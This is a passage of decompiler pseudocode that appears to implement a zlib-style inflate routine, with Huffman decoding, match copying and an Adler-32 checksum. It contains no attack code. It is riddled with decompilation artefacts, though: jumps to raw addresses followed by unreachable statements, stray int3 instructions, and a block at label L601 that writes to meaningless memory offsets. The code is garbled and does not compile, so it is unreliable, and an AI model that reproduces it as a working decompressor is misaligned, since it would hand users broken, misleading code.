													} else {
														 *(_t2870 - 0x10c) = 0;
													}
												}
												_t2086 =  *(_t2870 - 0x10) |  *(_t2870 - 0x10c);
												 *(_t2870 - 0x10) = _t2086;
											}
											if( *(_t2870 - 0x10) == 0) {
												goto L48;
											} else {
												goto L45;
											}
										}
									}
								}
								goto L600;
							case 3:
								if(0 != 0) {
									goto L51;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L50;
									} else {
										 *(__ebp - 0xe4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L58;
									}
								}
								goto L600;
							case 4:
								if(0 != 0) {
									goto L67;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L66;
									} else {
										 *(__ebp - 0xb0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L74;
									}
								}
								goto L600;
							case 5:
								if(0 != 0) {
									goto L86;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L85;
									} else {
										 *(__ebp - 0xec) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L93;
									}
								}
								goto L600;
							case 6:
								if(0 != 0) {
									goto L101;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L100;
									} else {
										 *((char*)( *((intOrPtr*)(__ebp + 8)) +  *((intOrPtr*)(__ebp - 0x10)) + 0x2920)) =  *( *(__ebp - 4));
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L108;
									}
								}
								goto L600;
							case 7:
								if(0 != 0) {
									goto L141;
								} else {
									goto L140;
								}
								goto L600;
							case 8:
								if(0 == 0) {
								}
								goto L165;
							case 9:
								if(0 != 0) {
									goto L193;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L192;
									} else {
										 *(__ebp - 0xe0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L200;
									}
								}
								goto L600;
							case 0xa:
								if(0 != 0) {
									goto L215;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L214;
									} else {
										 *(__ebp - 0xc0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L222;
									}
								}
								goto L600;
							case 0xb:
								if(0 != 0) {
									goto L293;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L292;
									} else {
										 *(__ebp - 0xb4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L300;
									}
								}
								goto L600;
							case 0xc:
								if(0 == 0) {
								}
								goto L318;
							case 0xd:
								if(0 != 0) {
									goto L325;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L324;
									} else {
										 *(__ebp - 0xbc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L332;
									}
								}
								goto L600;
							case 0xe:
								if(0 == 0) {
								}
								goto L344;
							case 0xf:
								if(0 != 0) {
									goto L367;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L366;
									} else {
										 *(__ebp - 0xc4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L374;
									}
								}
								goto L600;
							case 0x10:
								if(0 != 0) {
									goto L390;
								} else {
									goto L389;
								}
								goto L600;
							case 0x11:
								if(0 != 0) {
									goto L424;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L423;
									} else {
										 *(__ebp - 0xa4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L431;
									}
								}
								goto L600;
							case 0x12:
								if(0 != 0) {
									goto L454;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L453;
									} else {
										 *(__ebp - 0xd4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L461;
									}
								}
								goto L600;
							case 0x13:
								if(0 != 0) {
									goto L479;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L478;
									} else {
										 *(__ebp - 0xdc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L486;
									}
								}
								goto L600;
							case 0x14:
								if(0 != 0) {
									goto L536;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L535;
									} else {
										 *(__ebp - 0xa8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L543;
									}
								}
								goto L600;
							case 0x15:
								if(0 == 0) {
								}
								goto L581;
							case 0x16:
								if(0 == 0) {
								}
								goto L244;
							case 0x17:
								if(0 == 0) {
								}
								L45:
								 *(_t2870 - 0x1c) = 0xffffffff;
								_t2465 =  *(_t2870 + 8);
								 *_t2465 = 0x24;
								goto L600;
							case 0x18:
								if(0 == 0) {
								}
								goto L495;
							case 0x19:
								if(0 != 0) {
									goto L146;
								} else {
									goto L144;
								}
								goto L600;
							case 0x1a:
								if(0 == 0) {
								}
								goto L114;
							case 0x1b:
								if(0 == 0) {
								}
								goto L149;
							case 0x1c:
								if(0 != 0) {
									goto L555;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L554;
									} else {
										 *(__ebp - 0xac) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L562;
									}
								}
								goto L600;
							case 0x1d:
								if(0 != 0) {
									goto L570;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L569;
									} else {
										 *(__ebp - 0x90) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L577;
									}
								}
								goto L600;
							case 0x1e:
								if(0 != 0) {
									goto L122;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L121;
									} else {
										 *(__ebp - 0xb8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L129;
									}
								}
								goto L600;
							case 0x1f:
								if(0 != 0) {
									goto L135;
								} else {
									goto L134;
								}
								goto L600;
							case 0x20:
								if(0 != 0) {
									L504:
									 *(_t2870 - 0x1c) = 2;
									_t1692 =  *(_t2870 + 8);
									 *_t1692 = 0x35;
								} else {
									L503:
									_t2465 =  *(_t2870 - 0x14);
									if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
										 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t2870 + 0x14)) + ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88))));
										 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
										 *(_t2870 - 0x7c) =  *(_t2870 - 0x7c) + 1;
										L502:
										 *(_t2870 - 0x118) =  *(_t2870 - 0x10);
										_t2086 =  *(_t2870 - 0x10) - 1;
										 *(_t2870 - 0x10) = _t2086;
										if( *(_t2870 - 0x118) == 0) {
											L350:
											_t1747 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
											if(_t1747 < 4) {
												L352:
												if( *(_t2870 - 8) >= 0xf) {
													L381:
													goto 0x230bac;
													_t2519 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
													 *(_t2870 - 0x3c) = _t2519;
													if( *(_t2870 - 0x3c) < 0) {
														 *(_t2870 - 0x50) = 0xa;
														do {
															 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2519 * 0 + 0x920 + ( !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001)) * 2));
															_t2519 =  *(_t2870 - 0x50) + 1;
															 *(_t2870 - 0x50) = _t2519;
														} while ( *(_t2870 - 0x3c) < 0);
													} else {
														 *(_t2870 - 0x50) =  *(_t2870 - 0x3c) >> 9;
														 *(_t2870 - 0x3c) =  *(_t2870 - 0x3c) & 0x000001ff;
													}
													 *(_t2870 - 0x10) =  *(_t2870 - 0x3c);
													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x50);
													_t1747 =  *(_t2870 - 8) -  *(_t2870 - 0x50);
													 *(_t2870 - 8) = _t1747;
													_t2086 = 0;
													if(0 != 0) {
														goto L352;
													} else {
														if( *(_t2870 - 0x10) < 0x100) {
															L389:
															_t2465 =  *(_t2870 - 0x14);
															if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
																 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
																_t2086 =  *(_t2870 - 0x14) + 1;
																 *(_t2870 - 0x14) = _t2086;
																goto L417;
															} else {
																L390:
																 *(_t2870 - 0x1c) = 2;
																_t1692 =  *(_t2870 + 8);
																 *_t1692 = 0x18;
															}
														} else {
															goto L418;
														}
													}
												} else {
													if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
														_t1747 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
														 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
														goto L381;
													} else {
														L354:
														goto 0x230b73;
														_t2534 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
														 *(_t2870 - 0x3c) = _t2534;
														if( *(_t2870 - 0x3c) < 0) {
															if( *(_t2870 - 8) <= 0xa) {
																goto L365;
															} else {
																 *(_t2870 - 0x50) = 0xa;
																while(1) {
																	goto 0x230b86;
																	_t1747 =  !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001);
																	 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2534 * 0 + 0x920 + _t1747 * 2));
																	_t2534 =  *(_t2870 - 0x50) + 1;
																	 *(_t2870 - 0x50) = _t2534;
																	if( *(_t2870 - 0x3c) >= 0) {
																		break;
																	}
																	_t1747 =  *(_t2870 - 0x50) + 1;
																	if( *(_t2870 - 8) >= _t1747) {
																		continue;
																	}
																	break;
																}
																if( *(_t2870 - 0x3c) < 0) {
																	goto L365;
																} else {
																	goto L378;
																}
															}
														} else {
															_t1747 =  *(_t2870 - 0x3c) >> 9;
															 *(_t2870 - 0x50) = _t1747;
															if( *(_t2870 - 0x50) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x50)) {
																L365:
																_t2086 =  *(_t2870 - 4);
																if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																	 *(_t2870 - 0xc4) =  *( *(_t2870 - 4)) & 0x000000ff;
																	 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																	goto L376;
																} else {
																	L366:
																	_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																	if(_t2465 == 0) {
																		 *(_t2870 - 0xc4) = 0;
																		L374:
																		L376:
																		if(0 != 0) {
																			goto L365;
																		} else {
																			 *(_t2870 - 0xc) =  *(_t2870 - 0xc4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																			_t1747 =  *(_t2870 - 8) + 8;
																			 *(_t2870 - 8) = _t1747;
																			if( *(_t2870 - 8) < 0xf) {
																				goto L354;
																			} else {
																				goto L378;
																			}
																		}
																	} else {
																		L367:
																		 *(_t2870 - 0x1c) = 1;
																		_t1692 =  *(_t2870 + 8);
																		 *_t1692 = 0x17;
																	}
																}
															} else {
																L378:
																goto L381;
															}
														}
													}
												}
											} else {
												_t2086 =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
												if(_t2086 >= 2) {
													if( *(_t2870 - 8) < 0xf) {
														_t1747 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
														 *(_t2870 - 0xc) = _t1747;
														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
													}
													_t2164 =  *(_t2870 - 0xc) & 0x000003ff;
													 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + _t2164 * 2));
													if( *(_t2870 - 0x38) < 0) {
														 *(_t2870 - 0x54) = 0xa;
														do {
															_t2164 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2164 * 0 + 0x920 + ( !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001)) * 2));
															 *(_t2870 - 0x38) = _t2164;
															 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
														} while ( *(_t2870 - 0x38) < 0);
													} else {
														 *(_t2870 - 0x54) =  *(_t2870 - 0x38) >> 9;
													}
													 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x54);
													_t1863 =  *(_t2870 - 8) -  *(_t2870 - 0x54);
													 *(_t2870 - 8) = _t1863;
													if(( *(_t2870 - 0x10) & 0x00000100) == 0) {
														if( *(_t2870 - 8) < 0xf) {
															_t1863 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
															 *(_t2870 - 0xc) = _t1863;
															 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
															 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
														}
														_t2171 =  *(_t2870 - 0xc) & 0x000003ff;
														 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1863 * 0 + 0x120 + _t2171 * 2));
														if( *(_t2870 - 0x38) < 0) {
															 *(_t2870 - 0x54) = 0xa;
															do {
																_t1868 =  !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001);
																_t2171 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2171 * 0 + 0x920 + _t1868 * 2));
																 *(_t2870 - 0x38) = _t2171;
																 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
															} while ( *(_t2870 - 0x38) < 0);
														} else {
															_t1868 =  *(_t2870 - 0x38) >> 9;
															 *(_t2870 - 0x54) = _t1868;
														}
														goto 0x230c1e;
														asm("int3");
														 *(_t2870 - 0xc) = _t1868 >> _t2171;
														 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x54);
														 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
														_t1872 =  *(_t2870 - 0x38) & 0x00000100;
														if(_t1872 == 0) {
															_t2086 =  *(_t2870 - 0x14);
															 *((char*)(_t2086 + (_t1872 << 0))) =  *(_t2870 - 0x38);
															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 2;
															L417:
															goto L350;
														} else {
															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
															 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
															goto L418;
														}
													} else {
														L418:
														 *(_t2870 - 0x10) =  *(_t2870 - 0x10) & 0x000001ff;
														if( *(_t2870 - 0x10) != 0x100) {
															_t1769 =  *(0x22ac1c +  *(_t2870 - 0x10) * 4);
															 *(_t2870 - 0x24) = _t1769;
															_t2180 =  *(_t2870 - 0x10);
															_t2566 =  *(0x22b634 + _t2180 * 4);
															 *(_t2870 - 0x10) = _t2566;
															if( *(_t2870 - 0x24) == 0) {
																L437:
																if( *(_t2870 - 8) >= 0xf) {
																	L468:
																	_t2182 =  *((short*)( *(_t2870 + 8) + (_t1769 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																	 *(_t2870 - 0x44) = _t2182;
																	if( *(_t2870 - 0x44) < 0) {
																		 *(_t2870 - 0x4c) = 0xa;
																		do {
																			 *(_t2870 - 0x44) =  *((short*)( *(_t2870 + 8) + (_t2182 << 0) + 0x40 + 0x920 + ( !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001)) * 2));
																			_t2182 =  *(_t2870 - 0x4c) + 1;
																			 *(_t2870 - 0x4c) = _t2182;
																		} while ( *(_t2870 - 0x44) < 0);
																	} else {
																		 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
																		 *(_t2870 - 0x44) =  *(_t2870 - 0x44) & 0x000001ff;
																	}
																	 *(_t2870 - 0x28) =  *(_t2870 - 0x44);
																	_t1769 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x4c);
																	 *(_t2870 - 0xc) = _t1769;
																	 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x4c);
																	_t2566 = 0;
																	if(0 != 0) {
																		goto L437;
																	} else {
																		 *(_t2870 - 0x24) =  *(0x22b0a0 +  *(_t2870 - 0x28) * 4);
																		_t2592 =  *(_t2870 - 0x28);
																		_t1789 =  *(0x22b120 + _t2592 * 4);
																		 *(_t2870 - 0x28) = _t1789;
																		if( *(_t2870 - 0x24) == 0) {
																			L493:
																			 *(_t2870 - 0x7c) =  *(_t2870 - 0x14) -  *((intOrPtr*)(_t2870 + 0x14));
																			_t2465 =  *(_t2870 - 0x28);
																			if(_t2465 <=  *(_t2870 - 0x7c)) {
																				L498:
																				_t2211 = ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88)) +  *((intOrPtr*)(_t2870 + 0x14));
																				 *(_t2870 - 0x30) = _t2211;
																				if( *(_t2870 - 0x14) <=  *(_t2870 - 0x30)) {
																					_t2211 =  *(_t2870 - 0x30);
																					 *(_t2870 - 0xf4) = _t2211;
																				} else {
																					_t1789 =  *(_t2870 - 0x14);
																					 *(_t2870 - 0xf4) = _t1789;
																				}
																				if( *(_t2870 - 0xf4) +  *(_t2870 - 0x10) <=  *((intOrPtr*)(_t2870 - 0x70))) {
																					if( *(_t2870 - 0x10) < 9 ||  *(_t2870 - 0x10) >  *(_t2870 - 0x28)) {
																						L522:
																						goto L523;
																					} else {
																						 *((intOrPtr*)(_t2870 - 0x11c)) = ( *(_t2870 - 0x10) & 0xfffffff8) +  *(_t2870 - 0x30);
																						do {
																							 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2211 * 0));
																							 *((intOrPtr*)( *(_t2870 - 0x14) + (4 << 0))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (4 << 0)));
																							_t2211 =  *(_t2870 - 0x14) + 8;
																							 *(_t2870 - 0x14) = _t2211;
																							_t2612 =  *(_t2870 - 0x30) + 8;
																							 *(_t2870 - 0x30) = _t2612;
																							_t1789 =  *(_t2870 - 0x30);
																						} while (_t1789 <  *((intOrPtr*)(_t2870 - 0x11c)));
																						_t2086 =  *(_t2870 - 0x10) & 0x00000007;
																						 *(_t2870 - 0x10) = _t2086;
																						if( *(_t2870 - 0x10) >= 3) {
																							do {
																								goto L522;
																								L523:
																								 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t1789 * 0));
																								 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 0)));
																								 *((char*)( *(_t2870 - 0x14) + (1 << 1))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 1)));
																								_t2086 =  *(_t2870 - 0x14) + 3;
																								 *(_t2870 - 0x14) = _t2086;
																								 *(_t2870 - 0x30) =  *(_t2870 - 0x30) + 3;
																								_t1789 =  *(_t2870 - 0x10) - 3;
																								 *(_t2870 - 0x10) = _t1789;
																							} while ( *(_t2870 - 0x10) > 2);
																							if( *(_t2870 - 0x10) > 0) {
																								_t1798 =  *(_t2870 - 0x14);
																								 *_t1798 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2086 * 0));
																								if( *(_t2870 - 0x10) > 1) {
																									 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t1798 << 0)));
																								}
																								_t2086 =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
																								 *(_t2870 - 0x14) = _t2086;
																							}
																						} else {
																							if( *(_t2870 - 0x10) != 0) {
																								_t2086 =  *(_t2870 - 0x14);
																								 *_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2612 * 0));
																								if( *(_t2870 - 0x10) > 1) {
																									_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t2086 << 0)));
																									 *( *(_t2870 - 0x14) + (1 << 0)) = _t2086;
																								}
																								 *(_t2870 - 0x14) =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
																							}
																						}
																						goto L350;
																					}
																					L601:
																					 *(_t2075 + 0x5189f455) =  *(_t2075 + 0x5189f455) | _t2086;
																					 *(_t2075 + 0x4289f045) =  *(_t2075 + 0x4289f045) | _t2086;
																					_t2870 = _t2870;
																					 *(_t2075 + 0x5189dc55) =  *(_t2075 + 0x5189dc55) | _t2086;
																					 *((intOrPtr*)(_t2075 + 0x4d8b0845)) =  *((intOrPtr*)(_t2075 + 0x4d8b0845)) - _t2086;
																					asm("cld");
																					 *( *(_t2870 + 0x10)) = _t2465 + 1 -  *(_t2870 + 0xc);
																					 *( *(_t2870 + 0x1c)) =  *(_t2870 - 0x14) -  *(_t2870 + 0x18);
																					if(( *(_t2870 + 0x20) & 0x00000009) != 0 &&  *(_t2870 - 0x1c) >= 0) {
																						 *(_t2870 - 0x58) =  *(_t2870 + 0x18);
																						 *(_t2870 - 0x98) =  *( *(_t2870 + 0x1c));
																						 *(_t2870 - 0x20) =  *( *(_t2870 + 8) + 0x1c) & 0x0000ffff;
																						 *(_t2870 - 0x2c) =  *( *(_t2870 + 8) + 0x1c) >> 0x10;
																						_t1700 =  *(_t2870 - 0x98);
																						_t1701 = _t1700 / 0x15b0;
																						_t2473 = _t1700 % 0x15b0;
																						 *(_t2870 - 0xa0) = _t2473;
																						while( *(_t2870 - 0x98) != 0) {
																							 *(_t2870 - 0x84) = 0;
																							while( *(_t2870 - 0x84) + 7 <  *(_t2870 - 0xa0)) {
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + _t2473 * 0) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 0)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 1)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 3) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 2)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 5) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 6) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 7) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								_t2473 =  *(_t2870 - 0x84) + 8;
																								 *(_t2870 - 0x84) = _t2473;
																								_t1701 =  *(_t2870 - 0x58) + 8;
																								 *(_t2870 - 0x58) = _t1701;
																							}
																							while(1) {
																								_t2097 =  *(_t2870 - 0x84);
																								if(_t2097 >=  *(_t2870 - 0xa0)) {
																									break;
																								}
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x58) =  *(_t2870 - 0x58) + 1;
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								_t1701 =  *(_t2870 - 0x84) + 1;
																								 *(_t2870 - 0x84) = _t1701;
																							}
																							goto 0x230d69;
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							 *(_t2870 - 0x20) = _t1701 % _t2097;
																							_t1706 =  *(_t2870 - 0x2c);
																							_t1701 = _t1706 / 0xfff1;
																							 *(_t2870 - 0x2c) = _t1706 % 0xfff1;
																							_t2473 =  *(_t2870 - 0x98) -  *(_t2870 - 0xa0);
																							 *(_t2870 - 0x98) = _t2473;
																							 *(_t2870 - 0xa0) = 0x15b0;
																						}
																						_t1704 = ( *(_t2870 - 0x2c) << 0x10) +  *(_t2870 - 0x20);
																						_t2094 =  *(_t2870 + 8);
																						 *((intOrPtr*)(_t2094 + 0x1c)) = _t1704;
																						if( *(_t2870 - 0x1c) == 0 && ( *(_t2870 + 0x20) & 0x00000001) != 0) {
																							goto 0x230d81;
																							asm("int3");
																							if( *((intOrPtr*)(_t1704 + 0x1c)) !=  *((intOrPtr*)(_t2094 + 0x10))) {
																								 *(_t2870 - 0x1c) = 0xfffffffe;
																							}
																						}
																					}
																					_t1688 =  *(_t2870 - 0x1c);
																					goto L622;
																				} else {
																					goto L502;
																				}
																			} else {
																				_t1789 =  *(_t2870 + 0x20) & 0x00000004;
																				if(_t1789 == 0) {
																					goto L498;
																				} else {
																					L495:
																					 *(_t2870 - 0x1c) = 0xffffffff;
																					_t2086 =  *(_t2870 + 8);
																					 *_t2086 = 0x25;
																				}
																			}
																		} else {
																			L476:
																			_t2233 =  *(_t2870 - 8);
																			if(_t2233 >=  *(_t2870 - 0x24)) {
																				L490:
																				goto 0x230cba;
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				 *(_t2870 - 0x120) = (_t2592 << _t2233) - 0x00000001 &  *(_t2870 - 0xc);
																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																				 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																				_t2592 = 0;
																				if(0 != 0) {
																					goto L476;
																				} else {
																					_t1789 =  *(_t2870 - 0x28) +  *(_t2870 - 0x120);
																					 *(_t2870 - 0x28) = _t1789;
																					goto L493;
																				}
																			} else {
																				L477:
																				_t2465 =  *(_t2870 - 4);
																				if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																					 *(_t2870 - 0xdc) =  *( *(_t2870 - 4)) & 0x000000ff;
																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																					goto L488;
																				} else {
																					L478:
																					_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																					if(_t1692 == 0) {
																						 *(_t2870 - 0xdc) = 0;
																						L486:
																						L488:
																						if(0 != 0) {
																							goto L477;
																						} else {
																							_t2592 =  *(_t2870 - 0xdc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																							 *(_t2870 - 0xc) = _t2592;
																							 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																							_t2233 =  *(_t2870 - 8);
																							if(_t2233 <  *(_t2870 - 0x24)) {
																								goto L477;
																							} else {
																								goto L490;
																							}
																						}
																					} else {
																						L479:
																						 *(_t2870 - 0x1c) = 1;
																						_t2086 =  *(_t2870 + 8);
																						 *_t2086 = 0x1b;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t2190 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
																	if(_t2190 >= 2) {
																		_t1769 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
																		 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2190 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
																		 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
																		 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
																		goto L468;
																	} else {
																		L439:
																		_t1769 =  *((short*)( *(_t2870 + 8) + (_t2566 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																		 *(_t2870 - 0x44) = _t1769;
